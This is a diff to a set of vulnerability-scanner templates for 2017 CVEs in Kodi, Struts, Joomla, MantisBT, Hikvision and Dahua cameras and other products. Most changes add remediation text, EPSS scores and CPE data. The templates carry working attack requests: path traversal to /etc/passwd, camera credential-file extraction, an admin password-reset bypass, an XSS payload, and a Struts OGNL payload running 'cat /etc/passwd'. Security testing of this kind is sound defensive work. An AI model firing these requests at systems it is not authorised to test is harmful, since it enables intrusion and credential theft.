--- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input. + remediation: | + Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability. reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.exploit-db.com/exploits/41312/ @@ -14,10 +16,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-5982 - cwe-id: CWE-98 - tags: cve2017,kodi,lfi,edb,cve + cwe-id: CWE-22 + epss-score: 0.0488 + epss-percentile: 0.9186 + cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kodi + product: kodi + tags: cve2017,kodi,lfi,edb,cve http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 490a004630440220281b4078b54917916ffaf0fbbbae8961cfa693c309f05a888e0fae95985e75a502206e9a3059dd61fb76e9ea5fa747a815326052e2f81f110be26319802342824e67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 6053dc8635..485c37065c 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + remediation: | + Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 @@ -14,14 +16,19 @@ info: cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 + epss-score: 0.9726 + epss-percentile: 0.9979 + cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: phpcollab + product: phpcollab shodan-query: http.title:"PhpCollab" tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive http: - raw: - - | # REQUEST 1 + - | POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 @@ -33,9 +40,8 @@ http: -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 + - | + GET /logos_clients/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -49,4 +55,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/06 +# digest: 4a0a004730450220419a54f24e8e4390da99bc575825f1199516ee26250d2074e3ae71e385afe5ca022100f714ced54a3c2ab846d35873e090ef03403d383894e848e7ea3b45eafcb36025:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 4705be0097..097f55dc33 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -6,19 +6,27 @@ info: severity: critical description: | Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) + - regex("[\d]+(,\s+[\d]+)?", dav) + - regex(".*?PROPFIND", public) + - regex(".*?PROPFIND", allow) + condition: or + - type: word part: header words: - "IIS/6.0" - - type: dsl - dsl: - - regex("", dasl) # lowercase header name: DASL - - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV - - regex(".*?PROPFIND", public) # lowercase header name: Public - - regex(".*?PROPFIND", allow) # lowercase header name: Allow - condition: or - - type: status status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 4a0a00473045022100b8221e2224b3b0da0d06715eb9394d908a3aa349a88f3e585673072c3fa6cb1c022013e58712ace1a770794b465e253c8484eccf696acc2ab3db75f88c30ce744dd5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 3c822b61b2..4312bfa613 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL. + remediation: | + Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-7391 cwe-id: CWE-79 - tags: cve,cve2017,magmi,xss + epss-score: 0.00204 + epss-percentile: 0.58079 + cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: magmi_project + product: magmi + tags: cve,cve2017,magmi,xss http: - method: GET @@ -26,10 +33,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -40,4 +43,8 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4b0a004830460221009a736c0342b5f1b93cde90b2dd9ea8e6f073139c893c7e74bc02374793d4583b022100f8188f933e1ab735d4d8b543164367d2ba0524b98b6f57c7d21d7318c225859d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 1b2c53866a..2f44503db9 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -4,13 +4,14 @@ id: CVE-2017-7615 # To carry out further attacks, please see reference[2] below. # This template works by guessing user ID. # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - info: name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access author: bp0lr,dwisiswant0 severity: high description: | MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. + remediation: | + Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability. reference: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt @@ -22,11 +23,14 @@ info: cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 + epss-score: 0.97404 + epss-percentile: 0.999 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - epss-score: 0.97472 - tags: cve,cve2017,mantisbt,unauth,edb metadata: max-request: 5 + vendor: mantisbt + product: mantisbt + tags: cve,cve2017,mantisbt,unauth,edb http: - method: GET @@ -38,6 +42,7 @@ http: - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -49,4 +54,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a0047304502202e9032d309a5d02ec0ba8f2b6fc504ed095fc886e5a946474363dc4b80254245022100defe74408d6b98cdf29d7e2fcb885c5afaee4c1d5a4fda3ea97fd930d441b9f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 6f513bbfcf..ef6a9c7a9e 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -5,18 +5,26 @@ info: author: princechaddha severity: critical description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. + remediation: | + Apply the latest firmware update provided by Hikvision to fix the authentication bypass vulnerability. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 + - https://ghostbin.com/paste/q2vq2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 - tags: cve,cve2017,auth-bypass,hikvision + epss-score: 0.01361 + epss-percentile: 0.84759 + cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hikvision + product: ds-2cd2032-i_firmware + tags: cve,cve2017,auth-bypass,hikvision http: - method: GET @@ -26,13 +34,13 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/xml" - part: header -# Enhanced by mp on 2022/04/26 +# digest: 490a0046304402200adf6eb269de7e1da833a9cdd9415283effa00fd71864f5ad1e2be95a553d51602207bf4538c5ac0b5db84c4c5cd3fa6095d41a10135983f8cc20b8cae18b79ff269:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml new file mode 100644 index 0000000000..8312447d8e --- /dev/null +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -0,0 +1,49 @@ +id: CVE-2017-7925 + +info: + name: Dahua Security - Configuration File Disclosure + author: E1A,none + severity: critical + description: | + A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. + remediation: | + To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-7925 + - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02 + - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-7925 + cwe-id: CWE-522,CWE-260 + epss-score: 0.35031 + epss-percentile: 0.96643 + cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dahuasecurity + product: dh-ipc-hdbw23a0rn-zs_firmware + shodan-query: http.favicon.hash:2019488876 + tags: cve,cve2017,dahua,camera + +http: + - method: GET + path: + - "{{BaseURL}}/current_config/passwd" + + matchers: + - type: dsl + dsl: + - contains(to_lower(body), "ugm") + - contains(to_lower(body), "id:name:passwd") + - status_code == 200 + condition: and + + extractors: + - type: regex + group: 1 + regex: + - 1:(.*:.*):1:CtrPanel + +# digest: 4b0a00483046022100e49b13b4821e3f5e15efa2ddc11749609fd688782b306e9466e88f7e4c0cfa4c022100d9349c0df26bb203f1b5162d905e83595305c7d4a8cf3443ff0ea520ecfc17e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml new file mode 100644 index 0000000000..8678f43436 --- /dev/null +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-8229 + +info: + name: Amcrest IP Camera Web Management - Data Exposure + author: pussycat0x + severity: critical + description: | + Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-8229 + - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html + - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf + - https://seclists.org/bugtraq/2019/Jun/8 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-8229 + cwe-id: CWE-255 + epss-score: 0.93519 + epss-percentile: 0.98822 + cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: amcrest + product: ipm-721s_firmware + shodan-query: html:"Amcrest" + fofa-query: "Amcrest" + tags: packetstorm,seclists,cve,cve2017,amcrest,iot + +http: + - method: GET + path: + - "{{BaseURL}}/current_config/Sha1Account1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DevInformation" + - "SerialID" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 + +# digest: 490a004630440220168ec2c6cb5534941e1abf085a839637b8091c60064c4e01d4260e846b7a1c4c02205327c8348fe8d33b43eb35d7e577669dc8e8344a72223ab211f2f1e55e0a7b92:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index f9356b324d..39526315bf 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -6,21 +6,28 @@ info: severity: critical description: | Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability. reference: - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + epss-score: 0.97555 + epss-percentile: 0.99995 + cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.component:"Joomla" verified: true + max-request: 1 + vendor: joomla + product: joomla\! + shodan-query: http.component:"Joomla" tags: cve,cve2017,joomla,sqli - variables: num: "999999999" @@ -35,4 +42,4 @@ http: words: - '{{md5(num)}}' -# Enhanced by mp on 2022/09/28 +# digest: 4a0a00473045022100e1ffcdd97bdfe722fd96a7d7f95a25bbac621f3cd8770607c0383f1ca98c2c6002204c6fdc8c3359ae01f0f7adfd522902a69787216c8c3e6a22864ee32778e6b732:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index b04f7bbdc6..14537db85d 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -5,20 +5,26 @@ info: author: dhiyaneshDk severity: medium description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. + remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. reference: - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) - remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. + - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 - tags: cve,cve2017,xss,telerik + epss-score: 0.0021 + epss-percentile: 0.58728 + cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: progress + product: telerik_reporting + tags: cve,cve2017,xss,telerik http: - method: GET @@ -27,14 +33,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and -# Enhanced by cs on 2022/02/28 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d2348f9a7e33886bf094b404612e7d4eae8923958b4a4c44209456fb483771b8022100ae7c953ed0b1b5235932c011ddfe06c68d6b3f12388109d0e67876b88b874e5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 1983fd0b04..4577efae94 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -5,19 +5,28 @@ info: author: daffainfo severity: medium description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php. + remediation: | + Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability. reference: - https://github.com/MindscapeHQ/raygun4wordpress/pull/17 - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://wpvulndb.com/vulnerabilities/8836 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00168 + epss-percentile: 0.53626 + cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: raygun + product: raygun4wp + framework: wordpress + tags: cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402205bb86c129f7e78292c194e3c3378f0e8f065702f1e5a63607f76079d1d3b3adc02205c27b567d28789bf69b246a2aa9e25fea0d363290840437eefe906fa33a5c3df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index b161d35b87..1f46bcf427 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to a patched version of Odoo or apply the necessary security patches. reference: - https://github.com/odoo/odoo/issues/17394 - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 @@ -14,9 +16,14 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 + epss-score: 0.01037 + epss-percentile: 0.82272 + cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: odoo + product: odoo tags: cve,cve2017,odoo,lfi http: @@ -26,6 +33,7 @@ http: - "{{BaseURL}}/base_import/static/etc/passwd" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl @@ -42,4 +50,4 @@ http: - "status_code == 200" condition: and -# Enhanced by md on 2023/04/12 +# digest: 4a0a00473045022100ad4360027a0a1888645167c0b75df92634dfbec3cbc00f5e3d7906fd2abbfd9002202e534275e2add4b84053da350d177f44e5ad13a5b13e98bbe80c3520c2cb7f00:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 6e2e90331f..677ba52752 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery. + remediation: | + Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities. reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 @@ -15,8 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 + epss-score: 0.00575 + epss-percentile: 0.75486 + cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: atlassian + product: oauth shodan-query: http.component:"Atlassian Jira" tags: cve,cve2017,atlassian,jira,ssrf,oast @@ -29,8 +36,8 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502204e980a791a5ead74e98ce37902e9818f44069d47411573d2e68d11260745cc90022100c5c152607c9ef4ed0e973ad34782d5d5456b0375840df8220b972302f748e9ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 229030e990..f55c7a1772 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -6,40 +6,47 @@ info: severity: critical description: | Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838 + - http://www.securitytracker.com/id/1038838 + - https://security.netapp.com/advisory/ntap-20180706-0002/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* - epss-score: 0.9753 + epss-score: 0.97448 + epss-percentile: 0.99938 + cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: apache + product: struts shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" tags: cve,cve2017,apache,rce,struts,kev - variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" result: "{{to_number(num1)*to_number(num2)}}" # CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)} - http: - method: POST path: - "{{BaseURL}}/integration/saveGangster.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word @@ -53,4 +60,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 +# digest: 4b0a00483046022100fdf9038f8f8df68a0a05b977b4f55442b32ef3577985d50993057ce4989af384022100d5cf7e4442459200f852ffb6041b15e775fbcef15802aa8184adc024492c1cae:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index ed28aec5cd..1ffe2c982d 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -5,26 +5,34 @@ info: author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + - http://www.securitytracker.com/id/1039263 + - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - tags: cve,cve2017,apache,rce,struts,kev + epss-score: 0.97556 + epss-percentile: 0.99996 + cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts,kev http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml + body: | @@ -84,9 +92,11 @@ http: + headers: + Content-Type: application/xml + matchers-condition: and matchers: - - type: word words: - "Debugging information" @@ -97,4 +107,4 @@ http: status: - 500 -# Enhanced by mp on 2022/04/20 +# digest: 4b0a00483046022100f3df00f03a6604f0dd6e734400c293d18a72df79fda546d91831c53c9258762b022100e4d4f5c844577c17ac37a393d0391b380588424312cc221c55409303ea34a856:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 5dfd9a1fc9..37762daab8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -5,21 +5,26 @@ info: author: milo2012 severity: high description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. + remediation: | + Upgrade DotNetNuke to a version higher than 9.3.0 reference: - https://github.com/murataydemir/CVE-2017-9822 - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - http://www.dnnsoftware.com/community/security/security-center - - http://web.archive.org/web/20210124123810/https://www.securityfocus.com/bid/102213/ + 